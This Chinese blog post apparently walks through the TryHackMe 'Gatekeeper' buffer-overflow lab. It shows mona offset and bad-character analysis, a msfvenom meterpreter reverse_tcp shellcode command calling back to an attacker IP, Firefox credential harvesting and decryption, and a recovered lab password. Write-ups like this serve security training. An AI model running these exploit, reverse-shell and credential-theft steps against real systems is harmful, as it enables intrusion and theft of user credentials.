TryHackMe-进攻性渗透测试-18_缓冲区溢出_Gatekeeper

已于 2023-01-15 14:19:21 修改
阅读量174 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: 网络安全 windows web安全 网络
于 2022-12-28 14:53:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128468564
版权

Gatekeeper

你能越过大门,穿过火堆吗?

nmap扫

135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
31337/tcp open  Elite
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49164/tcp open  unknown

先进smb看看有没有东西

smbclient -L 10.10.90.4

有一个Users目录,连接进去之后搜寻一番发现了:

gatekeeper.exe

先下载下来,根据经验,用nc尝试连接那个几个端口

连接31337端口后随便输点东西,然后它就崩了🤣

好吧其实它会接收输入的数据,刚刚输了点东西它崩了,不出意外就是栈溢出了

由于我没windows相应的调试环境,那就再借这个https://tryhackme.com/room/bufferoverflowprep 房间的windows靶机用一下。

还是利用Immunity Debugger打开gatekeeper.exe

!mona config -set workingfolder c:\mona\%p

然后还是fuzz一波,再100字节上下就崩了。

我们生成200字节随机数据试一下

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200

!mona findmsp -distance 200

得出:

EIP contains normal pattern : 0x39654138 (offset 146)

把200字节的随机数据删掉,我们自己生成146字节数据填充。

随便用四字节字符覆盖eip: “BBBB”

查找坏字符

!mona bytearray -b "\x00"

!mona compare -f C:\mona\gatekeeper\bytearray.bin -a <eip_addr>

\x0a上榜,去掉后:

Unmodified

那么最终答案就是 \x00\x0a

找jmp esp地址:

!mona jmp -r esp -cpb "\x00\x0a"

盲猜一手小端序:将jmp esp地址倒转:

080414c3 -> \xc3\x14\x04\x08

生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.14.39.48 LPORT=8888 EXITFUNC=thread -b "\x00\x0a" -f c

在shellcode前面加 \x90 * 16或更多

将脚本ip改回本房间的靶机ip,运行

成功getshell

desktop下还有一个FireFox.lnk,根据提示:

run post/multi/gather/firefox_creds

然后将文件名恢复,并使用firefox_decrypt.py恢复凭据:

python3 /home/sugobet/firefox_decrypt.py ./

.

Website:   https://creds.com
Username: 'mayor'
Password: '8CL7O1N78MdrCIsV'

rdp连进去,root.txt就在桌面

Sugobet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Phala测试网2.0 GateKeeper操作搭建指南
DerrickLee仓库
07-19 2292
一、 环境搭建及测试 1. 测试要求 CPU:英特尔6代或更新的CPU,需支持SGX,至少双核心 内存:8GB(最低 2 G) 磁盘空间:40-80 GB(越大越好,建议采用 NVMe 固态硬盘,每六个月需要重新评估节点磁盘占用大小) 额外信息:尽可能在网络稳定的环境下进行测试,网络波动较大的内网可能在主网运行时期给Gatekeeper带来不必要的惩罚。 2. 测试环境安装 您可以参见自行安装 Intel SGX 驱动与平台...
TryHackMe-Gatekeeper
网安星空
12-28 889
TryHackMe靶场,缓冲区溢出,使用Immunity进行溢出测试,
python自动化测试locksetting/gatekeeper/keymaster/vts等
baron-周贺贺-代码改变世界ctw
03-04 485
test@test-pc:~/workspace/share/testcase/test_tee$ tree . . ├── resource │ ├── googlekey │ │ ├── default_googlekey.bin │ │ └── kmsetkey_ca │ └── vts_testcase │ ├── VtsHalBiometricsFaceV1_0TargetTest │ │ ├── arm │ │ │ └──
Gatekeeper
weixin_34290631的博客
04-20 549
Gatekeeper Overview The Gatekeeper subsystem performs device pattern/password authentication in a Trusted Execution Environment (TEE). Gatekeeper enrolls and verifies passwords via an HMAC with a ...
Tryhackme-Complete Beginner Introduction
个人博客
08-24 934
Complete Beginner Introduction 文章目录Complete Beginner IntroductionLeaning Cyber Securitytask1 Web Application Securitytask2 Network Securitytask3 Learning RoadmapTutorialtask1 Starting your first machineStarting Out In Cyber Sectask1 Welcome To TryHackMeta
effector-gatekeeper-dev::comet_selector:
02-22
OAuth GitHub GatekeeperAPI 交换令牌的临时代码GET /api/auth?code=<CODE>OAuth步骤另请参阅的。 重定向用户以请求GitHub访问。... const GITHUB_GATEKEEPER_URL = process . env . NODE_ENV === 'deve
ember-cli-gatekeeperGatekeeper的EmberJS附加组件
02-04
ember install ember-cli-gatekeeper 入门 定义配置 使用所需的配置值更新config/environment.js的ENV变量: 名称 描述 需要 默认值 gatekeeper.baseUrl 蓝图网守的位置 是 gatekeeper.startRoute 登录后过渡到的...
Python库 | flask_gatekeeper-0.2.1-py3-none-any.whl
05-31
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:flask_gatekeeper-0.2.1-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
gatekeeper-policy-manager:一个易于使用的基于WebGatekeeper策略管理器
04-27
网守策略管理器(GPM) Gatekeeper Policy Manager是一个简单的只读Web UI,用于查看... 默认情况下,这将在gatekeeper-system名称空间中创建一个名称为gatekeper-policy-manager的部署和服务。 我们邀请您看一下
TryHackMe-进攻性渗透测试-16_缓冲区溢出
M1n9K1n9的博客
12-27 257
相对较难,需要有较好的计组底子缓冲区溢出基础:https://tryhackme.com/room/bof1关于国内的博客讲的非常好的一篇文章,讲的很透彻很仔细:https://www.cnblogs.com/02SWD/p/15952483.html。
vulnhub靶机-djinn3
臭nana的博客
07-01 1667
1、靶机ip:192.168.0.110(开机就提示:不是所有的都需要扫描发现主机) 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.0.110 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.110 Host is up (0.0011s latency). Not shown: 65531 closed ports PORT STATE SERVICE V
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 6565
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
AndroidQ 锁屏密码验证流程之GateKeeper解析
qq_34211365的博客
04-29 5813
本篇文章分析一下GateKeeper这个模块,官网对GateKeeper的描述如下: Gatekeeper Gatekeeper 子系统会在可信执行环境 (TEE) 中执行设备解锁图案/密码身份验证。Gatekeeper 会使用由硬件支持的密钥通过 HMAC 注册和验证密码。此外,Gatekeeper 会限制连续失败的验证尝试次数,并且必须根据指定的超时和指定的连续失败尝试次数拒绝服务请求。 当用...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
线性表及其C语言实现
码明的博客
07-22 296
线性表(Linear List):由同类型数据元素构成有序序列的线性结构。特点:1.表中元素个数称为线性表的长度;2.线性表没有元素时称为空表;3.表的起始位置称为表头,表的结束位置称为表尾。
2024.7.22 作业
qq_64434282的博客
07-22 761
输出:该数的对应的进制数。输入:一个整数,进制数。
数据结构——单链表OJ题(下)
最新发布
2301_81888634的博客
07-25 598
链表既然包括单链表,就还有其他种类啦~敬请期待“双向链表”~
Windows 磁盘分区样式有几种?如何查看电脑分区样式?
qq_57728300的博客
07-23 544
Windows 分区样式有几种?我们如何查看自己电脑磁盘的分区样式?本文为你解答。
全面解读:Visio图例集 - 包含网络图标与电信设备示例
8. **特殊设备**:如MCU(Multipoint Control Unit,多点会议控制器)、GK(Gatekeeper,会话控制器)和特定平台如Radium、SIPP等。 通过这些图标,制图者可以方便地在Visio中构建出清晰、准确的网络拓扑图,以便于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值